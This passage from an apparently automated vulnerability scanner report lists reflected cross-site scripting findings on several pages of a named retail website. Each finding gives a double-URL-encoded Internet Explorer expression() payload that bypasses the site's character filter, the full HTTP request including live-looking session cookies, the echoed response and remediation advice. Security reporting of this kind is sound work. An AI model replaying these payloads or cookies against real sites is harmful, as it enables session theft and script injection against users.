This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /turner_about_us?12db7%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527560f4d45a75=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:47 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -2143029176:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=984
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 35153


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>TURNER - About us</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';
...[SNIP]...
http://www.turnerlicensing.com/s.nl?it=I&id=73&12db7%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527560f4d45a75=1&12db7%27style%3d%27x%3aexpression%28alert%281%29%29%27560f4d45a75=1&12db7'style='x:expression(alert(1))'560f4d45a75=1&fromsla=T'>
...[SNIP]...

1.136. http://www.turnerlicensing.com/turner_boxed_note_cards [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /turner_boxed_note_cards

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 372c9%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527137ac6a221e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 372c9'style='x:expression(alert(1))'137ac6a221e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /turner_boxed_note_cards?372c9%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527137ac6a221e=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:59 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -109238462:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=991
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 99993


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Boxed Note Cards</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</s
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?category=175953&372c9%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527137ac6a221e=1&372c9'style='x:expression(alert(1))'137ac6a221e=1&372c9%27style%3d%27x%3aexpression%28alert%281%29%29%27137ac6a221e=1&fromsla=T'>
...[SNIP]...

1.137. http://www.turnerlicensing.com/turner_christmas_cards [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /turner_christmas_cards

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8303b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527fa4a56a0150 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8303b'style='x:expression(alert(1))'fa4a56a0150 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /turner_christmas_cards?8303b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527fa4a56a0150=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:53:02 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 2002010489:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=886
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 97041


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Christmas Cards</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</sc
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?category=175954&8303b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527fa4a56a0150=1&8303b'style='x:expression(alert(1))'fa4a56a0150=1&8303b%27style%3d%27x%3aexpression%28alert%281%29%29%27fa4a56a0150=1&fromsla=T'>
...[SNIP]...

1.138. http://www.turnerlicensing.com/turner_deluxe_journals [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /turner_deluxe_journals

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ba999%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d367c03018a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ba999'style='x:expression(alert(1))'d367c03018a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /turner_deluxe_journals?ba999%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d367c03018a=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:53:03 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -1146969885:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=971
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 99853


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Deluxe Journals</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</sc
...[SNIP]...
//www.turnerlicensing.com/s.nl?category=175957&ba999%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d367c03018a=1&ba999%27style%3d%27x%3aexpression%28alert%281%29%29%27d367c03018a=1&ba999'style='x:expression(alert(1))'d367c03018a=1&fromsla=T'>
...[SNIP]...

1.139. http://www.turnerlicensing.com/turner_frequently_asked_questions [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /turner_frequently_asked_questions

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7e4b5%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527c1c6aa6bced was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7e4b5'style='x:expression(alert(1))'c1c6aa6bced in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /turner_frequently_asked_questions?7e4b5%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527c1c6aa6bced=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:52 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -1590872232:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=741
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 44105


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>TURNER - Frequently Asked Questions</title>


<script language='JavaScript' type='text/javascript'>window.st
...[SNIP]...
.turnerlicensing.com/s.nl?it=I&id=77&7e4b5%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527c1c6aa6bced=1&7e4b5%27style%3d%27x%3aexpression%28alert%281%29%29%27c1c6aa6bced=1&fromsla=T&7e4b5'style='x:expression(alert(1))'c1c6aa6bced=1'>
...[SNIP]...

1.140. http://www.turnerlicensing.com/turner_mini_wall_calendars [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /turner_mini_wall_calendars

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 511bd%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527e16792023be was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 511bd'style='x:expression(alert(1))'e16792023be in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /turner_mini_wall_calendars?511bd%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527e16792023be=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:53:02 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -1146969928:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=691
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 99826


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Mini Wall Calendars</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';
...[SNIP]...
//www.turnerlicensing.com/s.nl?category=338456&511bd%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527e16792023be=1&511bd%27style%3d%27x%3aexpression%28alert%281%29%29%27e16792023be=1&511bd'style='x:expression(alert(1))'e16792023be=1&fromsla=T'>
...[SNIP]...

1.141. http://www.turnerlicensing.com/turner_notebooks [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /turner_notebooks

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b1dc3%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527ff1d101c939 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b1dc3'style='x:expression(alert(1))'ff1d101c939 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /turner_notebooks?b1dc3%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527ff1d101c939=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:53:05 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 2002010872:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=902
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 100220


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Notebooks</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>

...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?category=175959&b1dc3%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527ff1d101c939=1&b1dc3'style='x:expression(alert(1))'ff1d101c939=1&fromsla=T&b1dc3%27style%3d%27x%3aexpression%28alert%281%29%29%27ff1d101c939=1'>
...[SNIP]...

1.142. http://www.turnerlicensing.com/turner_payment_options [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /turner_payment_options

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1b6ff%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527e20c6c92743 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1b6ff'style='x:expression(alert(1))'e20c6c92743 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /turner_payment_options?1b6ff%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527e20c6c92743=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:52 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 334661099:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=912
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 34203


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>TURNER - Payment Options</title>


<script language='JavaScript' type='text/javascript'>window.status='Loadi
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?it=I&id=79&1b6ff%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527e20c6c92743=1&1b6ff'style='x:expression(alert(1))'e20c6c92743=1&1b6ff%27style%3d%27x%3aexpression%28alert%281%29%29%27e20c6c92743=1&fromsla=T'>
...[SNIP]...

1.143. http://www.turnerlicensing.com/turner_privacy_security [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /turner_privacy_security

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload aa83d%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527495e2755ee9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as aa83d'style='x:expression(alert(1))'495e2755ee9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /turner_privacy_security?aa83d%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527495e2755ee9=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:51 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 1558107999:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=771
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 37621


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>TURNER - Privacy & Security</title>


<script language='JavaScript' type='text/javascript'>window.status='Lo
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?it=I&id=80&aa83d%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527495e2755ee9=1&aa83d'style='x:expression(alert(1))'495e2755ee9=1&aa83d%27style%3d%27x%3aexpression%28alert%281%29%29%27495e2755ee9=1&fromsla=T'>
...[SNIP]...

1.144. http://www.turnerlicensing.com/turner_puzzles [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /turner_puzzles

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 15822%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527e24cf7166ad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 15822'style='x:expression(alert(1))'e24cf7166ad in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /turner_puzzles?15822%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527e24cf7166ad=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:53:04 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -109237774:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=967
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 99435


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Puzzles</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<s
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?category=175963&15822%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527e24cf7166ad=1&15822'style='x:expression(alert(1))'e24cf7166ad=1&15822%27style%3d%27x%3aexpression%28alert%281%29%29%27e24cf7166ad=1&fromsla=T'>
...[SNIP]...

1.145. http://www.turnerlicensing.com/turner_returns_exchanges [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /turner_returns_exchanges

Issue detail

